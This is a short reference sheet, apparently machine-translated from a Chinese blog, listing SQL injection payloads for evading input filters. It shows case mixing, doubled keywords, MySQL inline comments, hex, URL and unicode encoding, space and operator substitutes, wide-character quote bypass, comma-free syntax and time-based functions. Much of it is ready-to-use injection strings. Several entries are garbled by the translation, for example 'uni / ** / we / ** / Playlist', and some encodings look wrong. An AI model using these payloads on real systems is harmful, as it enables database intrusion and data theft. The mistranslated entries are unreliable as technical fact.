sql injection techniques to bypass common

Reference link: https: //blog.csdn.net/huanghelouzi/article/details/82995313

                  https://www.cnblogs.com/vincy99/p/9642882.html

table of Contents:

1. Bypassing the case
2. Write double bypass
3. Inline comments bypass
4. Encoding bypass
5. <> Bypass
6. Bypassing the Notes
7. To bypass spaces
8. To bypass or / and the
9. To bypass the equal sign =
10. Bypassing single quotes
11. To bypass the comma
12. Bypassing the filter function

0x01-sensitive bypass

UniOn SeleCt

Write 0x02 double bypass

ununionion seselectlect

0x03 inline comments bypass

Inline comments that only some specific statements on MYSQL placed  /*!...*/ , so if these statements are not executed in other databases, but will be executed in MYSQL.

and /*!select*/ 1,2

0x04 bypass coding

Hex bypass:

select * from users where username = test1;
select * from users where username = 0x7465737431;

Keyword twice url entire coding:

1+and+1=2
1+%25%36%31%25%36%65%25%36%34+1=2 

unicode encoding bypassing part of the symbols:

Single quotes =>% u0037% u02b9
Space =>% u0020% uff00
Left parenthesis =>% u0028% uff08
Right parenthesis =>% u0029% uff09

0x05 <> bypass

Some sites filtered "<>" symbol for the job:

unio<>n sel<>ect

0x06 comment symbol bypass

uni / ** / we / ** / Playlist

0x07 bypassing of spaces

/**/
%20 %09
()
Enter (url encoding % 0A)
`(Tap key button above)
tap
Two spaces

0x08 bypass on or / and the

and = &&
or = ||

0x09 to bypass the equal sign =

Without 通配符the likeeffect and implementation of =the same, it can be used to bypass;

rlikeUsage and above like, there is no effect and wildcards =, like;

regexp: MySQL REGEXP operator used to perform regular expression matching

<> Is equivalent to! =, Plus one in the front so !the result is an equal sign

?id=1 or 1 like 1
?id=1 or 1 rlike 1
?id=1 or 1 regexp 1
?id=1 or !(1 <> 1)或者1 !(<>) 1

Single quotes to bypass 0x10

Wide character

# Filtering single quotes 
% bf% 27% df% 27 % aa% 27

Hexadecimal

'user'=>0x7573657273

0x11 commas bypass

Use blind from n1 for n2, where n1 n2 starts reading the representative length n1 from a substring

select substr("string",1,3);
等价于 select substr("string" from 1 for 3);

Use joinkeywords to bypass

union select 1,2,3
等价于 union select * from (select 1)a join (select 2)b join(select 3)c

Use offset Keyword:

Applies to limit the filtered comma
limit 2,1 equivalent to the limit 1 offset 2

0x12 bypass the filter function

sleep() -->benchmark()

and sleep(1)
Benchmark equivalent and ( 1000000000,1)

group_concat()–>concat_ws()

select group_concat("str1","str2");
等价于 select concat_ws(",","str1","str2");